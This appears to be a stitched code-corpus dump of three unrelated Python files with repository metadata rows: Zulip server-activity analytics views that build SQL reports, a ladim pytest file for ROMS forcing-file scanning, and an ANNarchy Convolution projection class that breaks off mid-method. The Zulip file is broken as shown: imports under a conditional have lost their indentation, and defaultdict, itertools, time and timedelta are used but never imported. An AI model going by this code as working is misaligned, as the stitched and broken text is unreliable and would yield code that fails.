from typing import Callable, Dict, List, Optional, Sequence, Tuple, Union
from django.conf import settings
from django.db import connection
from django.http import HttpRequest, HttpResponse
from django.shortcuts import render
from django.template import loader
from django.utils.timezone import now as timezone_now
from jinja2.utils import Markup as mark_safe
from psycopg2.sql import SQL, Composable, Literal
from analytics.lib.counts import COUNT_STATS
from analytics.views.activity_common import (
dictfetchall,
format_date_for_activity_reports,
make_table,
realm_activity_link,
realm_stats_link,
remote_installation_stats_link,
)
from analytics.views.support import get_plan_name
from zerver.decorator import require_server_admin
from zerver.lib.request import has_request_variables
from zerver.lib.timestamp import timestamp_to_datetime
from zerver.models import Realm, UserActivityInterval, UserProfile, get_org_type_display_name
if settings.BILLING_ENABLED:
from corporate.lib.stripe import (
estimate_annual_recurring_revenue_by_realm,
get_realms_to_default_discount_dict,
)
def get_realm_day_counts() -> Dict[str, Dict[str, str]]:
    """Return, per realm string_id, pre-rendered HTML table cells with the
    human message count for each of the last 8 days (today plus 7 prior).

    The returned mapping is {string_id: {"cnts": "<td>...</td>..."}}; the
    min/max day (excluding today) is styled "bad"/"good", today "neutral".
    """
    # Message counts per realm per day-age (0 = today .. 7), humans only,
    # excluding mirror/monitoring clients.
    query = SQL(
        """
        select
            r.string_id,
            (now()::date - date_sent::date) age,
            count(*) cnt
        from zerver_message m
        join zerver_userprofile up on up.id = m.sender_id
        join zerver_realm r on r.id = up.realm_id
        join zerver_client c on c.id = m.sending_client_id
        where
            (not up.is_bot)
        and
            date_sent > now()::date - interval '8 day'
        and
            c.name not in ('zephyr_mirror', 'ZulipMonitoring')
        group by
            r.string_id,
            age
        order by
            r.string_id,
            age
        """
    )
    cursor = connection.cursor()
    cursor.execute(query)
    rows = dictfetchall(cursor)
    cursor.close()

    # counts[string_id][age] = message count; ages missing from the query
    # result default to 0 below.
    counts: Dict[str, Dict[int, int]] = defaultdict(dict)
    for row in rows:
        counts[row["string_id"]][row["age"]] = row["cnt"]

    result = {}
    for string_id in counts:
        # index 0 is today (partial day); styling min/max is computed over
        # the 7 complete days only
        raw_cnts = [counts[string_id].get(age, 0) for age in range(8)]
        min_cnt = min(raw_cnts[1:])
        max_cnt = max(raw_cnts[1:])

        # closure over this realm's min_cnt/max_cnt (redefined per realm)
        def format_count(cnt: int, style: Optional[str] = None) -> str:
            if style is not None:
                good_bad = style
            elif cnt == min_cnt:
                good_bad = "bad"
            elif cnt == max_cnt:
                good_bad = "good"
            else:
                good_bad = "neutral"

            return f'<td class="number {good_bad}">{cnt}</td>'

        cnts = format_count(raw_cnts[0], "neutral") + "".join(map(format_count, raw_cnts[1:]))
        result[string_id] = dict(cnts=cnts)

    return result
def realm_summary_table(realm_minutes: Dict[str, float]) -> str:
    """Render the realm-summary HTML table for the server activity page.

    :param realm_minutes: per-realm online minutes (from user activity
        intervals); folded into per-realm hour columns below.
    :return: rendered HTML string (analytics/realm_summary_table.html).
    """
    now = timezone_now()

    # One row per realm with DAU/WAU/user/bot counts pulled from the
    # analytics_realmcount rollups at their last successful fill times.
    # NOTE(review): `realm.plan_type = 3` hardcodes what is presumably
    # Realm.STANDARD (cf. the Realm.STANDARD branch further down) -- verify.
    query = SQL(
        """
        SELECT
            realm.string_id,
            realm.date_created,
            realm.plan_type,
            realm.org_type,
            coalesce(wau_table.value, 0) wau_count,
            coalesce(dau_table.value, 0) dau_count,
            coalesce(user_count_table.value, 0) user_profile_count,
            coalesce(bot_count_table.value, 0) bot_count
        FROM
            zerver_realm as realm
        LEFT OUTER JOIN (
            SELECT
                value _14day_active_humans,
                realm_id
            from
                analytics_realmcount
            WHERE
                property = 'realm_active_humans::day'
                AND end_time = %(realm_active_humans_end_time)s
        ) as _14day_active_humans_table ON realm.id = _14day_active_humans_table.realm_id
        LEFT OUTER JOIN (
            SELECT
                value,
                realm_id
            from
                analytics_realmcount
            WHERE
                property = '7day_actives::day'
                AND end_time = %(seven_day_actives_end_time)s
        ) as wau_table ON realm.id = wau_table.realm_id
        LEFT OUTER JOIN (
            SELECT
                value,
                realm_id
            from
                analytics_realmcount
            WHERE
                property = '1day_actives::day'
                AND end_time = %(one_day_actives_end_time)s
        ) as dau_table ON realm.id = dau_table.realm_id
        LEFT OUTER JOIN (
            SELECT
                value,
                realm_id
            from
                analytics_realmcount
            WHERE
                property = 'active_users_audit:is_bot:day'
                AND subgroup = 'false'
                AND end_time = %(active_users_audit_end_time)s
        ) as user_count_table ON realm.id = user_count_table.realm_id
        LEFT OUTER JOIN (
            SELECT
                value,
                realm_id
            from
                analytics_realmcount
            WHERE
                property = 'active_users_audit:is_bot:day'
                AND subgroup = 'true'
                AND end_time = %(active_users_audit_end_time)s
        ) as bot_count_table ON realm.id = bot_count_table.realm_id
        WHERE
            _14day_active_humans IS NOT NULL
            or realm.plan_type = 3
        ORDER BY
            dau_count DESC,
            string_id ASC
        """
    )

    cursor = connection.cursor()
    cursor.execute(
        query,
        {
            "realm_active_humans_end_time": COUNT_STATS[
                "realm_active_humans::day"
            ].last_successful_fill(),
            "seven_day_actives_end_time": COUNT_STATS["7day_actives::day"].last_successful_fill(),
            "one_day_actives_end_time": COUNT_STATS["1day_actives::day"].last_successful_fill(),
            "active_users_audit_end_time": COUNT_STATS[
                "active_users_audit:is_bot:day"
            ].last_successful_fill(),
        },
    )
    rows = dictfetchall(cursor)
    cursor.close()

    # Fetch all the realm administrator users
    realm_owners: Dict[str, List[str]] = defaultdict(list)
    for up in UserProfile.objects.select_related("realm").filter(
        role=UserProfile.ROLE_REALM_OWNER,
        is_active=True,
    ):
        realm_owners[up.realm.string_id].append(up.delivery_email)

    # Derive display fields (age, owner emails) per realm
    for row in rows:
        row["date_created_day"] = row["date_created"].strftime("%Y-%m-%d")
        row["age_days"] = int((now - row["date_created"]).total_seconds() / 86400)
        row["is_new"] = row["age_days"] < 12 * 7
        row["realm_owner_emails"] = ", ".join(realm_owners[row["string_id"]])

    # get messages sent per day
    counts = get_realm_day_counts()
    for row in rows:
        try:
            row["history"] = counts[row["string_id"]]["cnts"]
        except Exception:
            # realm had no messages in the window; render an empty cell
            row["history"] = ""

    # estimate annual subscription revenue
    total_arr = 0
    if settings.BILLING_ENABLED:
        estimated_arrs = estimate_annual_recurring_revenue_by_realm()
        realms_to_default_discount = get_realms_to_default_discount_dict()

        for row in rows:
            row["plan_type_string"] = get_plan_name(row["plan_type"])

            string_id = row["string_id"]

            if string_id in estimated_arrs:
                row["arr"] = estimated_arrs[string_id]

            # effective billing rate: 100 minus any default discount
            if row["plan_type"] == Realm.STANDARD:
                row["effective_rate"] = 100 - int(realms_to_default_discount.get(string_id, 0))
            elif row["plan_type"] == Realm.STANDARD_FREE:
                row["effective_rate"] = 0
            elif row["plan_type"] == Realm.LIMITED and string_id in realms_to_default_discount:
                row["effective_rate"] = 100 - int(realms_to_default_discount[string_id])
            else:
                row["effective_rate"] = ""

        total_arr += sum(estimated_arrs.values())

    for row in rows:
        row["org_type_string"] = get_org_type_display_name(row["org_type"])

    # augment data with realm_minutes
    total_hours = 0.0
    for row in rows:
        string_id = row["string_id"]
        minutes = realm_minutes.get(string_id, 0.0)
        hours = minutes / 60.0
        total_hours += hours
        row["hours"] = str(int(hours))
        try:
            row["hours_per_user"] = "{:.1f}".format(hours / row["dau_count"])
        except Exception:
            # dau_count of 0 -> division by zero; leave the cell unset
            pass

    # formatting
    for row in rows:
        row["stats_link"] = realm_stats_link(row["string_id"])
        row["string_id"] = realm_activity_link(row["string_id"])

    # Count active sites
    def meets_goal(row: Dict[str, int]) -> bool:
        # "active" threshold: at least 5 daily active users
        return row["dau_count"] >= 5

    num_active_sites = len(list(filter(meets_goal, rows)))

    # create totals
    total_dau_count = 0
    total_user_profile_count = 0
    total_bot_count = 0
    total_wau_count = 0
    for row in rows:
        total_dau_count += int(row["dau_count"])
        total_user_profile_count += int(row["user_profile_count"])
        total_bot_count += int(row["bot_count"])
        total_wau_count += int(row["wau_count"])

    total_row = dict(
        string_id="Total",
        plan_type_string="",
        org_type_string="",
        effective_rate="",
        arr=total_arr,
        stats_link="",
        date_created_day="",
        realm_owner_emails="",
        dau_count=total_dau_count,
        user_profile_count=total_user_profile_count,
        bot_count=total_bot_count,
        hours=int(total_hours),
        wau_count=total_wau_count,
    )

    rows.insert(0, total_row)

    content = loader.render_to_string(
        "analytics/realm_summary_table.html",
        dict(
            rows=rows,
            num_active_sites=num_active_sites,
            utctime=now.strftime("%Y-%m-%d %H:%MZ"),
            billing_enabled=settings.BILLING_ENABLED,
        ),
    )
    return content
def user_activity_intervals() -> Tuple[str, Dict[str, float]]:
    """Summarize per-user online duration over the trailing 24 hours.

    Returns a tuple of:
      * an HTML fragment (built with ``mark_safe``) listing, per realm and
        per user, the total online time derived from UserActivityInterval
        rows overlapping the window;
      * a dict mapping realm ``string_id`` to total online minutes for
        that realm (consumed by the realm summary table).

    Note: the previous annotation ``Tuple[mark_safe, ...]`` used the
    ``mark_safe`` *function* as a type; ``mark_safe`` returns a ``str``
    subclass, so ``str`` is the correct annotation.
    """
    day_end = timestamp_to_datetime(time.time())
    day_start = day_end - timedelta(hours=24)

    output = "Per-user online duration for the last 24 hours:\n"
    total_duration = timedelta(0)

    # Ordering by (realm, email) is required for correctness below:
    # itertools.groupby only groups *consecutive* rows with equal keys.
    all_intervals = (
        UserActivityInterval.objects.filter(
            end__gte=day_start,
            start__lte=day_end,
        )
        .select_related(
            "user_profile",
            "user_profile__realm",
        )
        .only(
            "start",
            "end",
            "user_profile__delivery_email",
            "user_profile__realm__string_id",
        )
        .order_by(
            "user_profile__realm__string_id",
            "user_profile__delivery_email",
        )
    )

    # Named key functions instead of lambda assignments (PEP 8 E731).
    def by_string_id(row):
        return row.user_profile.realm.string_id

    def by_email(row):
        return row.user_profile.delivery_email

    realm_minutes = {}

    for string_id, realm_intervals in itertools.groupby(all_intervals, by_string_id):
        realm_duration = timedelta(0)
        output += f"<hr>{string_id}\n"
        for email, intervals in itertools.groupby(realm_intervals, by_email):
            duration = timedelta(0)
            for interval in intervals:
                # Clamp each interval to the 24-hour window before summing.
                start = max(day_start, interval.start)
                end = min(day_end, interval.end)
                duration += end - start
            total_duration += duration
            realm_duration += duration
            output += f" {email:<37}{duration}\n"
        realm_minutes[string_id] = realm_duration.total_seconds() / 60

    output += f"\nTotal duration: {total_duration}\n"
    output += f"\nTotal duration in minutes: {total_duration.total_seconds() / 60.}\n"
    output += f"Total duration amortized to a month: {total_duration.total_seconds() * 30. / 60.}"
    content = mark_safe("<pre>" + output + "</pre>")
    return content, realm_minutes
def ad_hoc_queries() -> List[Dict[str, str]]:
    """Run a fixed set of reporting SQL queries and return one rendered HTML
    table per query, as dicts with "title" and "content" keys."""

    def get_page(
        query: Composable, cols: Sequence[str], title: str, totals_columns: Sequence[int] = []
    ) -> Dict[str, str]:
        # Execute the query and fetch all rows as mutable lists so that
        # columns can be rewritten in place below.
        cursor = connection.cursor()
        cursor.execute(query)
        rows = cursor.fetchall()
        rows = list(map(list, rows))
        cursor.close()

        def fix_rows(
            i: int, fixup_func: Union[Callable[[str], mark_safe], Callable[[datetime], str]]
        ) -> None:
            # Apply fixup_func in place to column i of every row.
            for row in rows:
                row[i] = fixup_func(row[i])

        # Post-process well-known column names (turn realm names and
        # hostnames into links, format dates) and accumulate an optional
        # totals row for the columns listed in totals_columns.
        total_row = []
        for i, col in enumerate(cols):
            if col == "Realm":
                fix_rows(i, realm_activity_link)
            elif col in ["Last time", "Last visit"]:
                fix_rows(i, format_date_for_activity_reports)
            elif col == "Hostname":
                # The stats link needs the server id, which is column 0.
                for row in rows:
                    row[i] = remote_installation_stats_link(row[0], row[i])
            if len(totals_columns) > 0:
                if i == 0:
                    total_row.append("Total")
                elif i in totals_columns:
                    # NULL (None) values are skipped when summing.
                    total_row.append(str(sum(row[i] for row in rows if row[i] is not None)))
                else:
                    total_row.append("")
        if len(totals_columns) > 0:
            rows.insert(0, total_row)

        content = make_table(title, cols, rows)

        return dict(
            content=content,
            title=title,
        )

    pages = []

    ###
    # Mobile client usage, one page per client family.
    for mobile_type in ["Android", "ZulipiOS"]:
        title = f"{mobile_type} usage"

        query = SQL(
            """
            select
                realm.string_id,
                up.id user_id,
                client.name,
                sum(count) as hits,
                max(last_visit) as last_time
            from zerver_useractivity ua
            join zerver_client client on client.id = ua.client_id
            join zerver_userprofile up on up.id = ua.user_profile_id
            join zerver_realm realm on realm.id = up.realm_id
            where
                client.name like {mobile_type}
            group by string_id, up.id, client.name
            having max(last_visit) > now() - interval '2 week'
            order by string_id, up.id, client.name
            """
        ).format(
            mobile_type=Literal(mobile_type),
        )

        cols = [
            "Realm",
            "User id",
            "Name",
            "Hits",
            "Last time",
        ]

        pages.append(get_page(query, cols, title))

    ###
    title = "Desktop users"

    query = SQL(
        """
        select
            realm.string_id,
            client.name,
            sum(count) as hits,
            max(last_visit) as last_time
        from zerver_useractivity ua
        join zerver_client client on client.id = ua.client_id
        join zerver_userprofile up on up.id = ua.user_profile_id
        join zerver_realm realm on realm.id = up.realm_id
        where
            client.name like 'desktop%%'
        group by string_id, client.name
        having max(last_visit) > now() - interval '2 week'
        order by string_id, client.name
        """
    )

    cols = [
        "Realm",
        "Client",
        "Hits",
        "Last time",
    ]

    pages.append(get_page(query, cols, title))

    ###
    # Incoming webhook/integration traffic grouped by realm.
    title = "Integrations by realm"

    query = SQL(
        """
        select
            realm.string_id,
            case
                when query like '%%external%%' then split_part(query, '/', 5)
                else client.name
            end client_name,
            sum(count) as hits,
            max(last_visit) as last_time
        from zerver_useractivity ua
        join zerver_client client on client.id = ua.client_id
        join zerver_userprofile up on up.id = ua.user_profile_id
        join zerver_realm realm on realm.id = up.realm_id
        where
            (query in ('send_message_backend', '/api/v1/send_message')
            and client.name not in ('Android', 'ZulipiOS')
            and client.name not like 'test: Zulip%%'
            )
        or
            query like '%%external%%'
        group by string_id, client_name
        having max(last_visit) > now() - interval '2 week'
        order by string_id, client_name
        """
    )

    cols = [
        "Realm",
        "Client",
        "Hits",
        "Last time",
    ]

    pages.append(get_page(query, cols, title))

    ###
    # Same data as above, grouped by client first.
    title = "Integrations by client"

    query = SQL(
        """
        select
            case
                when query like '%%external%%' then split_part(query, '/', 5)
                else client.name
            end client_name,
            realm.string_id,
            sum(count) as hits,
            max(last_visit) as last_time
        from zerver_useractivity ua
        join zerver_client client on client.id = ua.client_id
        join zerver_userprofile up on up.id = ua.user_profile_id
        join zerver_realm realm on realm.id = up.realm_id
        where
            (query in ('send_message_backend', '/api/v1/send_message')
            and client.name not in ('Android', 'ZulipiOS')
            and client.name not like 'test: Zulip%%'
            )
        or
            query like '%%external%%'
        group by client_name, string_id
        having max(last_visit) > now() - interval '2 week'
        order by client_name, string_id
        """
    )

    cols = [
        "Client",
        "Realm",
        "Hits",
        "Last time",
    ]

    pages.append(get_page(query, cols, title))

    # Remote (self-hosted) servers reporting into this installation; the
    # totals row sums the "Analytics users" and "Mobile users" columns.
    title = "Remote Zulip servers"

    query = SQL(
        """
        with icount as (
            select
                server_id,
                max(value) as max_value,
                max(end_time) as max_end_time
            from zilencer_remoteinstallationcount
            where
                property='active_users:is_bot:day'
                and subgroup='false'
            group by server_id
            ),
        remote_push_devices as (
            select server_id, count(distinct(user_id)) as push_user_count from zilencer_remotepushdevicetoken
            group by server_id
        )
        select
            rserver.id,
            rserver.hostname,
            rserver.contact_email,
            max_value,
            push_user_count,
            max_end_time
        from zilencer_remotezulipserver rserver
        left join icount on icount.server_id = rserver.id
        left join remote_push_devices on remote_push_devices.server_id = rserver.id
        order by max_value DESC NULLS LAST, push_user_count DESC NULLS LAST
        """
    )

    cols = [
        "ID",
        "Hostname",
        "Contact email",
        "Analytics users",
        "Mobile users",
        "Last update time",
    ]

    pages.append(get_page(query, cols, title, totals_columns=[3, 4]))

    return pages
@require_server_admin
@has_request_variables
def get_installation_activity(request: HttpRequest) -> HttpResponse:
    """Render the installation-wide /activity page: realm counts,
    per-user durations, and the ad hoc report tables."""
    duration_content, realm_minutes = user_activity_intervals()
    counts_content: str = realm_summary_table(realm_minutes)
    data = [("Counts", counts_content), ("Durations", duration_content)]
    data.extend((page["title"], page["content"]) for page in ad_hoc_queries())

    return render(
        request,
        "analytics/activity.html",
        context=dict(data=data, title="Activity", is_home=True),
    )
|
hackerkid/zulip
|
analytics/views/installation_activity.py
|
Python
|
apache-2.0
| 19,623
|
[
"VisIt"
] |
1a4e8d3aa6e5cb39c4e9d2b78eb1773d10c9ceb4ff78825dc38065f5969fbd41
|
from pathlib import Path
from datetime import datetime
import numpy as np
from netCDF4 import Dataset
import pytest
from ladim.gridforce.ROMS import Forcing
@pytest.fixture
def nc_files():
    """Create ten small netCDF files with hourly time records, one per day,
    and remove them again after the test."""
    file_names = [f"test_file{day:02d}.nc" for day in range(10)]

    for day, fname in enumerate(file_names):
        ncid = Dataset(fname, mode="w")
        ncid.createDimension("time", size=3)
        tvar = ncid.createVariable("ocean_time", "float64", ("time",))
        tvar.units = "seconds since 2015-01-01 00:00:00"
        # Three hourly frames at the start of day number `day`.
        tvar[:] = [day * 86400 + hour * 3600 for hour in range(3)]
        ncid.close()

    yield

    # Teardown: delete the generated files.
    for fname in file_names:
        Path(fname).unlink()
def test_find_files(nc_files):
    """Finding correct forcing files"""
    # All files matching the glob pattern
    files = Forcing.find_files(dict(input_file="test_file*.nc"))
    assert len(files) == 10

    # Limit from front
    files = Forcing.find_files(
        dict(input_file="test_file*.nc", first_file="test_file02.nc")
    )
    assert len(files) == 8
    assert files[0] == "test_file02.nc"

    # Limit from back
    files = Forcing.find_files(
        dict(input_file="test_file*.nc", last_file="test_file02.nc")
    )
    assert len(files) == 3
    assert files[-1] == "test_file02.nc"

    # A last_file beyond all files has no effect
    files = Forcing.find_files(dict(input_file="test_file*.nc", last_file="xxx.nc"))
    assert len(files) == 10

    # A first_file beyond all files excludes everything
    files = Forcing.find_files(dict(input_file="test_file*.nc", first_file="xxx.nc"))
    assert files == []

    # A pattern matching a single file
    files = Forcing.find_files(dict(input_file="test_file03.nc"))
    assert files == ["test_file03.nc"]
def test_scan_times(nc_files):
    """Scanning the time frames of the forcing files."""
    # The well-formed case: 10 files x 3 hourly frames
    files = [f"test_file{i:02d}.nc" for i in range(10)]
    all_frames, num_frames = Forcing.scan_file_times(files)
    assert len(all_frames) == 30
    assert all_frames[4] == np.datetime64("2015-01-02 01")
    # Frames are strictly increasing (no duplicates, sorted)
    assert all(np.unique(all_frames) == all_frames)
    assert len(num_frames) == 10
    assert num_frames["test_file05.nc"] == 3

    # Files given out of chronological order should abort
    with pytest.raises(SystemExit):
        Forcing.scan_file_times(["test_file05.nc", "test_file03.nc"])

    # The same file twice gives duplicate time frames and should abort
    with pytest.raises(SystemExit):
        Forcing.scan_file_times(["test_file05.nc", "test_file05.nc"])
def test_forcing_steps(nc_files):
    """Check the mapping from forcing time frames to model time steps."""
    # Test OK
    start = np.datetime64("2015-01-03 13:00:00")
    stop = np.datetime64("2015-01-04 19:00:00")
    dt = 1800  # model time step [seconds]
    config = dict(start_time=start, stop_time=stop, dt=dt)
    files = [f"test_file{i:02d}.nc" for i in range(10)]
    all_frames, num_frames = Forcing.scan_file_times(files)
    steps, file_idx, frame_idx = Forcing.forcing_steps(
        config, files, all_frames, num_frames
    )
    # One model-step entry per forcing time frame
    assert len(steps) == len(all_frames)
    # The first frame (2015-01-01 00) lies k model steps before start
    dstart = start - np.datetime64("2015-01-01")
    k = int(dstart / np.timedelta64(dt, "s"))
    assert steps[0] == -k
    # Consecutive frames within a file are one hour apart
    assert steps[1] - steps[0] == 3600 / dt
    # First frames of consecutive files are one day apart
    assert steps[3] - steps[0] == 24 * 3600 / dt
    d = 5  # file number = day number
    f = 1  # time frame = hour, 0 <= f < 3
    k = d * 3 + f  # forcing index
    # time step from first file,
    # 1 file per day, 1 hour per time frame, 2 steps per hour
    v = steps[0] + (d * 24 + f) * 2
    assert all_frames[k] == np.datetime64(f"2015-01-{1+d:02d} {f:02d}")
    assert steps[k] == v
    assert file_idx[v] == f"test_file{d:02d}.nc"
    assert frame_idx[v] == f  # second time frame in file
|
bjornaa/ladim
|
test/test_ROMS_forcing.py
|
Python
|
mit
| 3,662
|
[
"NetCDF"
] |
236f54ca0226f9c55e7e22a011b158ea00afd15883f8b2914efd4f7a3da964e2
|
# =============================================================================
#
# Convolution.py
#
# This file is part of ANNarchy.
#
# Copyright (C) 2019 Julien Vitay <julien.vitay@gmail.com>,
# Helge Uelo Dinkelbach <helge.dinkelbach@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ANNarchy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# =============================================================================
from __future__ import print_function
import numpy as np
from copy import deepcopy
from ANNarchy.core import Global
from ANNarchy.core.Projection import Projection
from ANNarchy.generator.Utils import tabify
from .ConvolveTemplate import *
from .Utils import SharedSynapse
# Indices used for each dimension
indices = ['i', 'j', 'k', 'l', 'm', 'n']
class Convolution(Projection):
"""
Performs a convolution of a weight kernel on the pre-synaptic population.
Despite its name, the operation performed is actually a cross-correlation, as is usual in computer vision and convolutional neural networks:
$$g(x) = \sum_{k=-n}^n h(k) \, f(x + k)$$
The convolution operation benefits from giving a multi-dimensional geometry to the populations and filters, for example in 2D:
```python
inp = Population(geometry=(100, 100), neuron=Neuron(parameters="r = 0.0"))
pop = Population(geometry=(100, 100), neuron=Neuron(equations="r = sum(exc)"))
proj = Convolution(inp, pop, 'exc')
proj.connect_filter(
[
[-1., 0., 1.],
[-1., 0., 1.],
[-1., 0., 1.]
])
```
The maximum number of dimensions for populations and filters is 4, an error is thrown otherwise.
Depending on the number of dimensions of the pre- and post-synaptic populations, as well as of the kernel, the convolution is implemented differentely.
**Method connect_filter()**
* If the pre- and post-populations have the same dimension as the kernel, the convolution is regular. Example:
(100, 100) * (3, 3) -> (100, 100)
* If the post-population has one dimension less than the pre-synaptic one, the last dimension of the kernel must match the last one of the pre-synaptic population. Example:
(100, 100, 3) * (3, 3, 3) -> (100, 100)
* If the kernel has less dimensions than the two populations, the number of neurons in the last dimension of the populations must be the same. The convolution will be calculated for each feature map in the last dimension. In this case, you must set ``keep_last_dimension`` to ``True``. Example:
(100, 100, 16) * (3, 3) -> (100, 100, 16)
**Method connect_filters()**
* If the kernel has more dimensions than the pre-synaptic population, this means a bank of different filters will be applied on the pre-synaptic population (like a convolutional layer in a CNN). Attention: the first index of ``weights`` corresponds to the different filters, while the result will be accessible in the last dimension of the post-synaptic population. You must set the ``multiple`` argument to True. Example:
(100, 100) * (16, 3, 3) -> (100, 100, 16)
The convolution **always** uses padding for elements that would be outside the array (no equivalent of ``valid`` in tensorflow). It is 0.0 by default, but can be changed using the ``padding`` argument. Setting ``padding`` to the string ``border`` will repeat the value of the border elements.
Sub-sampling will be automatically performed according to the populations' geometry. If these geometries do not match, an error will be thrown. Example:
(100, 100) * (3, 3) -> (50, 50)
You can redefine the sub-sampling by providing a list ``subsampling`` as argument, defining for each post-synaptic neuron the coordinates of the pre-synaptic neuron which will be the center of the filter/kernel.
"""
def __init__(self, pre, post, target, psp="pre.r * w", operation="sum", name=None, copied=False):
    """
    :param pre: pre-synaptic population (either its name or a ``Population`` object).
    :param post: post-synaptic population (either its name or a ``Population`` object).
    :param target: type of the connection
    :param psp: continuous influence of a single synapse on the post-synaptic neuron (default for rate-coded: ``w*pre.r``).
    :param operation: operation (sum, max, min, mean) performed by the kernel (default: sum).
    """
    # The shared synapse description only drives code generation; it is
    # not used as a regular synapse model.
    synapse = SharedSynapse(
        psp=psp,
        operation=operation,
        name="Convolution operation",
        description="Convoluted kernel over the pre-synaptic population.",
    )
    Projection.__init__(
        self,
        pre,
        post,
        target,
        synapse=synapse,
        name=name,
        copied=copied,
    )

    # Convolution projections cannot be saved to disk.
    self._saveable = False

    # Remember which connect_*() variant was used; needed by _copy().
    self._used_single_filter = False
    self._used_bank_of_filters = False

    self.operation = operation
def connect_filter(self, weights, delays=0.0, keep_last_dimension=False, padding=0.0, subsampling=None):
    """
    Applies a single filter on the pre-synaptic population.

    :param weights: numpy array or list of lists representing the matrix of weights for the filter.
    :param delays: delay in synaptic transmission (default: dt). Can only be the same value for all neurons.
    :param keep_last_dimension: defines if the last dimension of the pre- and post-synaptic will be convolved in parallel. The weights matrix must have one dimension less than the pre-synaptic population, and the number of neurons in the last dimension of the pre- and post-synaptic populations must match. Default: False.
    :param padding: value to be used for the rates outside the pre-synaptic population. If it is a floating value, the pre-synaptic population is virtually extended with this value above its boundaries. If it is equal to 'border', the values on the boundaries are repeated. Default: 0.0.
    :param subsampling: list for each post-synaptic neuron of coordinates in the pre-synaptic population defining the center of the kernel/filter. Default: None.
    """
    # Process the weights
    self.weights = np.array(weights)

    # Process the delays. Validate *before* converting: the previous order
    # called float(delays) first, so a non-numeric argument raised a raw
    # TypeError/ValueError instead of the explicit ANNarchy error below.
    if not isinstance(delays, (int, float)):
        Global._error('Convolutions can only have constant delays.')
    self.delays = float(delays)

    self.subsampling = subsampling
    self.keep_last_dimension = keep_last_dimension
    self.padding = padding
    self.multiple = False

    # Check dimensions of populations and weight matrix
    self.dim_kernel = self.weights.ndim
    self.dim_pre = self.pre.dimension
    self.dim_post = self.post.dimension

    if self.dim_post > 4:
        print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
        Global._error('Convolution: Too many dimensions for the post-synaptic population (maximum 4).')

    if self.dim_pre > 4:
        print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
        Global._error('Convolution: Too many dimensions for the pre-synaptic population (maximum 4).')

    if self.dim_kernel > 5 or (not self.multiple and self.dim_kernel > 4):
        print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
        Global._error('Convolution: Too many dimensions for the kernel (maximum 4).')

    # Check if the last axes match for parallel convolution (e.g. 3-2-3)
    if self.dim_kernel < self.dim_pre:
        if not self.keep_last_dimension:
            print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
            Global._error('Convolution: If the kernel has less dimensions than the pre-synaptic population, you need to set the flag keep_last_dimension to True.')
        if self.pre.geometry[-1] != self.post.geometry[-1]:
            print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
            Global._error('Convolution: If the kernel has fewer dimensions than the two populations (keep_last_dimension=True), these must have the same number of neurons in the last dimension.')

    # If the last dim of the kernel matches the last dim of the pre-pop, the post-pop can have one dimension less.
    if self.dim_post < self.dim_pre:  # OK, but check the last dimension of the kernel has the same size as the pre-population
        if self.weights.shape[-1] != self.pre.geometry[-1]:
            print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
            Global._error('Convolution: If the post-synaptic population has less dimensions than the pre-synaptic one, the last dimension of the filter must be equal to the last of the pre-synaptic population.')

    # Check if it is a bank of filters (not allowed here; use connect_filters())
    if self.dim_kernel > self.dim_pre:
        print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
        Global._error('Convolution: If the kernel has more dimensions than the pre-synaptic population, you need to use the connect_filters() method.')

    # Generate the pre-synaptic coordinates
    self._generate_pre_coordinates()

    # Finish building the synapses
    self._create()

    # For copy
    self._used_single_filter = True

    return self
def connect_filters(self, weights, delays=0.0, keep_last_dimension=False, padding=0.0, subsampling=None):
    """
    Applies a set of different filters on the pre-synaptic population.

    The weights matrix must have one dimension more than the pre-synaptic populations, and the number of neurons in the last dimension of the post-synaptic population must be equal to the number of filters.

    :param weights: numpy array or list of lists representing the matrix of weights for the filter.
    :param delays: delay in synaptic transmission (default: dt). Can only be the same value for all neurons.
    :param keep_last_dimension: defines if the last dimension of the pre- and post-synaptic will be convolved in parallel. The weights matrix must have one dimension less than the pre-synaptic population, and the number of neurons in the last dimension of the pre- and post-synaptic populations must match. Default: False.
    :param padding: value to be used for the rates outside the pre-synaptic population. If it is a floating value, the pre-synaptic population is virtually extended with this value above its boundaries. If it is equal to 'border', the values on the boundaries are repeated. Default: 0.0.
    :param subsampling: list for each post-synaptic neuron of coordinates in the pre-synaptic population defining the center of the kernel/filter. Default: None.
    """
    # Process the weights
    self.weights = np.array(weights)

    # Process the delays. Validate *before* converting: the previous order
    # called float(delays) first, so a non-numeric argument raised a raw
    # TypeError/ValueError instead of the explicit ANNarchy error below.
    if not isinstance(delays, (int, float)):
        Global._error('Convolutions can only have constant delays.')
    self.delays = float(delays)

    self.subsampling = subsampling
    self.keep_last_dimension = keep_last_dimension
    self.padding = padding
    self.multiple = True

    # Check dimensions of populations and weight matrix
    self.dim_kernel = self.weights.ndim
    self.dim_pre = self.pre.dimension
    self.dim_post = self.post.dimension

    if self.dim_post > 4:
        print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
        Global._error('Convolution: Too many dimensions for the post-synaptic population (maximum 4).')

    if self.dim_pre > 4:
        print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
        Global._error('Convolution: Too many dimensions for the pre-synaptic population (maximum 4).')

    # With a bank of filters, the kernel carries one extra (filter) axis.
    if self.dim_kernel > 5 or (not self.multiple and self.dim_kernel > 4):
        print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
        Global._error('Convolution: Too many dimensions for the kernel (maximum 4).')

    # Check if the last axes match for parallel convolution (e.g. 3-2-3)
    if self.dim_kernel < self.dim_pre:
        if not self.keep_last_dimension:
